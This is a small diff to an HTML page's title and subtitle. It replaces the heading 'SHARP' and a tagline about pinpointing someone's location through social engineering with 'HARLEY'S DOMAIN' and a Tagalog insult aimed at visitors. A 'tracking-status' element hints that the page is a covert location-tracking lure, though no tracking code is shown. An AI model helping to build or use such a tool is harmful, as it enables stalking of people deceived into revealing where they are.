--- a/public/index.html
+++ b/public/index.html
@@ -221,8 +221,8 @@
 </head>
 <body>
     <div class="container">
-        <h1>SHARP</h1>
-        <div class="subtitle">PRECISELY PINPOINT SOMEONE'S LOCATION THROUGH THE ART OF SOCIAL ENGINEERING</div>
+        <h1>HARLEY'S DOMAIN</h1>
+        <div class="subtitle">WELCOME TO MY WORLD MGA HAMPAS LUPA</div>
         
         <div id="tracking-status" style="margin-top: 10px; font-size: 14px;"></div>
         
